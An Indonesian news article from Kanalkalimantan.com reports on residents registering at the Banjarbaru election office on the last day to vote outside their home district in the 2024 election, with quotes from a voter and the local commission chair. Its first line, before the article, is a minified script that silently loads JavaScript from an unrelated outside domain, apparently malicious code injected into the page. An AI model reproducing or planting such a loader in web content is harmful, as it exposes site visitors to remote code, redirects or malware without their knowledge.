(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Pemilu 2024

Hari Terakhir Warga Urus Pindah Memilih di Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Silih berganti warga berdatangan ke kantor Komisi Pemilhan Umum (KPU) Kota Banjarbaru pada hari terakhir pelayanan pindah memilih, Rabu (7/2/2024) siang.

Warga yang datang ingin pindah memilih itu segera mengurus Daftar Pemilih Tambahan (DPTb) untuk memenuhi hak pilih dalam Pemilu 2024.

KPU Banjarbaru membuka jam pelayanan pengurusan hingga Rabu (7/2/2024) malam, tepatnya berakhir di pukul 23.00 Wita.

Baca juga: KPU Banjarbaru Masih Tunggu Sisa Surat Suara

Junaidi, warga Kabupaten Barito Kuala saat mengurus pindah memilih di kantor KPU Kota Banjarbaru. Foto: wanda

Warga yang datang untuk pindah memilih ada yang dari luar kota dan ada juga berasal dari luar provinsi, seperti Kabupaten Barito Kuala, Pontianak, Kalbar hingga Bali.

Seperti yang dilakukan Junaidi. Warga beralamat Kabupaten Barito Kuala itu berniat melakukan pencoblosan di wilayah tempat ia ditugaskan bekerja yakni Banjarbaru.

“Saya mengurus pindah memilih dikarenakan saya yang dari Barito Kuala sedang diberikan amanah untuk bertugas di Kota Banjarbaru,” ujar Junaidi kepada Kanalkalimantan.com, Rabu (7/2/2024) sore.

Baca juga: Waspada Waktu Rawan Kecurangan di TPS, Ini Menurut Tim DKPP Kalsel 

Karena saat hari H pencoblosan ia tak bisa pulang dan masih bertugas di Banjarbaru, ia pun mengaku tak ingin kehilangan hak suaranya begitu saja.

“Kita sebagai rakyat dan sekaligus juga anak muda pasti ingin menyampaikan hak suara kita sendiri dalam ajang Pemilu 2024 ini,” ungkap dia.

Junaidi menjelaskan proses pengurusan DPTb ini tidak lah sulit dan cukup cepat. Warga pun hanya diminta memastikan namanya ada di website KPU sebegai pemilih.

Baca juga: Kasus Korupsi 30 iPad DPRD Banjarbaru: Penyedia Divonis 3 Tahun Penjara

Kemudian melengkapi beberapa persyaratan yang dibawa, seperti fotocopy e-KTP dan surat keterangan bekerja.

“Kita membawa surat keterangan kerja dari perusahaan atau instansi untuk dilampirkan serta ada fotocopy e-KTP, sekalian dilampirkan fotocopy id card karyawan,” sebut Junaidi.

Baca juga: Ini Rincian Gaji Petugas KPPS dan Uang Operasional TPS

Sementara itu, Ketua KPU Banjarbaru Rozy Maulana mengatakan, nama-nama pemilih yang masuk dalam Daftar Pemilih Tetap (DPT), Daftar Pemilih Tambahan (DPTb) maupun Daftar Pemilih Khusus (DPK) dipastikan mendapatkan hak suara pada hari pencoblosan.

“Masing-masing TPS sudah kita lebihkan 2 persen surat suara, kalau habis di TPS satu bisa bergeser ke TPS lain, jika habis lagi bergeser lagi untuk pemilih DPTb begitu seterusnya,” jelas Ketua KPU Banjarbaru Rozy Maulana.

Baca juga: Buka Pembinaan Tata Kelola ASN di Pemkab Banjar Ini Harapan Saidi Mansyur

Namun, Rozy menyatakan bahwa kemungkinan surat suara kurang sangatlah kecil, sebab sudah diatur jadwal pencoblosan untuk setiap jenis pemilih.

“Insya Allah tidak mungkin kekurangan untuk surat suara, karena DPT sudah dijadwalkan memilih dari jam 07.00 Wita sampai berakhirnya pukul 13.00 Wita,” sebut Rozy.

Baca juga: Janji Kawal Usulan Prioritas Musrenbang Kecamatan Pasak Telawang

Begitu dengan DPTb, sambung dia, yang dijadwalkan mulai mencoblos pukul 11.00 usai DPT selesai.

Termasuk surat suara DPK yang diantisipasi kekurangannya melalui melalui pengaturan waktu mencoblos oleh KPU RI di mulai pukul 12.00 – 13.00 Wita. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

4 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

4 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

5 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

5 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

5 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

5 jam ago

This website uses cookies.